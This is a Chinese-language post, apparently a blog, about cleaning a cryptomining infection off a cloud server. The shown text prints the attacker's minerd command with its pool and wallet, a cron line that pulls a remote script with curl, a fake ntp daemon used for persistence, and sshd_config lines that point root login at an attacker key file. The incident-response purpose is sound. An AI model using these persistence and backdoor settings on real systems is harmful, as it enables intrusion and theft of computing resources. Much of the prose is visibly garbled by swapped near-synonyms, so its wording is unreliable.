阿里云上报警提示有异地IP登陆，上去之后发明处事器被黑了。以下是措置惩罚惩罚过程:
木马排查
1，首先top发明有minerd对CPU的占有到达了100%，此前这台处事器上是没有跑任何应用的，直觉报告我minerd有问题哦
[root@ll_sas01 ~/.ssh]# ps aux|grep minerd
root 7174 99.6 0.1 239504 5400 ? SLsl 15:08 29:05 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:6666 -u 448J3JccPv4D8XWvFJ6wFwLZuVtYdQSSFKoKnLS5pU4EL6SfsGvg4AAHqNeLK8LguDFpJtcFJ6ZWr1NAbuEVmHEz5JftEox -p x
root 7727 0.0 0.0 103260 872 pts/2 S+ 15:37 0:00 grep minerd
可以看到，root用户启动的。应该是已经被攻下了。minerd路径在/opt下
进入/opt下
[root@ll_sas01 /opt]# ls
KHK75NEOiq33 minerd rh
多了两个文件KHK75NEOiq33 minerd
一看文件时间，公然，都是刚刚创建的,创建时间15:07，这下好了，先来安置文件创建时间来查一波。看他到底做了几多工作。
[root@ll_sas01 /opt]# rm KHK75NEOiq33 minerd
rm: remove regular file `KHK75NEOiq33'? y
rm: remove regular file `minerd'? y
先把文件删失，进程杀失。过了一会又生成了。必需看一下按时任务啊
发明/var/spool/cron/root被改削，还多了个/var/spool/cron/crontabs/root
按时任务被改削了。
删删删。。。断根按时任务。之后发明没什么乱用，minerd进程很坚挺，不管了先，排除一下还有什么对象
检察一下按时任务的日志

可以看到他通过curl命令在网上拉对象，我手动拉一下看看*/10 * * * * curl -fsSL ?0706
下载下来是个pm.sh脚本

就是这么个对象。。。
添加按时任务，改削登录认证，重启sshd处事
创建/opt/KHK75NEOiq33 安置
还启动ntp处事。一开始没注意，但一看启动时间，就感受有问题了，linux自带的时间处事器是ntpd。一字之差误导众生，干失先
在/etc/ini.t发明ntp处事，创建时间和/opt下的minerd一样的。
趁便看了一下rc.d下发明很多新创建的链接都连接到ntp。。
这个ntp应该就是minerd的守护进程了吧。
此时也改看一下.ssh目录了，终究免登陆就是在这里
[root@ll_sas01 ~]# ls .ssh
id_rsa id_rsa.pub known_hosts KHK75NEOiq
看到了KHK75NEOiq这么个文件他是在对方pm.sh文件里生成的，终究authorized_keys被他删失了么。
查一下/root/.viminfo
""1 LINE 0
PubkeyAuthentication yes
"2 LINE 0
RSAAuthentication yes
"3 LINE 0
PermitRootLogin yes
"4 LINE 0
AuthorizedKeysFile .ssh/KHK75NEOiq
cat /etc/ssh/sshd_config
PubkeyAuthentication yes
RSAAuthentication yes
PermitRootLogin yes
AuthorizedKeysFile .ssh/KHK75NEOiq
最下边多了这4行改削了认证文件指向了KHK75NEOiq 删失配置先

先禁止22端口登陆，禁止root登陆
防火墙禁失出了本地ssh登陆以外的所有入站操纵。
[root@ll_sas01 /etc/rc.d/rc3.d]# ls /usr/sbin/ntp -l
-rwxr-xr-x 1 root root 8444416 Oct 20 15:07 /usr/sbin/ntp
在/etc/init.d/ntp中发明ntp路径/usr/sbin/ntp
[root@ll_sas01 /etc/rc.d/rc3.d]# rm /usr/sbin/ntp
rm: remove regular file `/usr/sbin/ntp'? y
清理一下rc.d下边的链接
[root@ll_sas01 /etc/rc.d]# ll -t rc1.d/
total 0
lrwxrwxrwx 1 root root 15 Oct 20 15:07 K02ntp -> /etc/init.d/ntp
找到rc.d下的15:07创建的指向/etc/init.d/ntp的链接
[root@ll_sas01 /etc/rc.d]# rm init.d/ntp
[root@ll_sas01 /etc/rc.d]# rm -rf rc0.d/K02ntp
[root@ll_sas01 /etc/rc.d]# rm -rf rc1.d/K02ntp
[root@ll_sas01 /etc/rc.d]# rm -rf rc2.d/S50ntp
[root@ll_sas01 /etc/rc.d]# rm -rf rc3.d/S50ntp
[root@ll_sas01 /etc/rc.d]# rm -rf rc4.d/S50ntp
[root@ll_sas01 /etc/rc.d]# rm -rf rc5.d/S50ntp
[root@ll_sas01 /etc/rc.d]# rm -rf rc6.d/K02ntp
通过时间查找发明/usr/local下有个etc 里边有个minerd.conf
[root@ll_sas01 /usr/local/etc]# ll
-rw-r--r-- 1 root root 162 Oct 20 15:07 minerd.conf
[root@ll_sas01 /usr/local/etc]# cat minerd.conf
-B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:6666 -u 448J3JccPv4D8XWvFJ6wFwLZuVtYdQSSFKoKnLS5pU4EL6SfsGvg4AAHqNeLK8LguDFpJtcFJ6ZWr1NAbuEVmHEz5JftEox -p x[ 
删除木马日志
[root@ll_sas01 ~]# rm /var/log/ntp.err
杀失minerd进程
之后发明没有复兴来。。。
配置改回来，改削处事器暗码
杀毒算完成了，可是他是怎么进来的呢。。。因为是我刚安置的系统，就只装了个redis和rabbitmq 其他应用都没有呢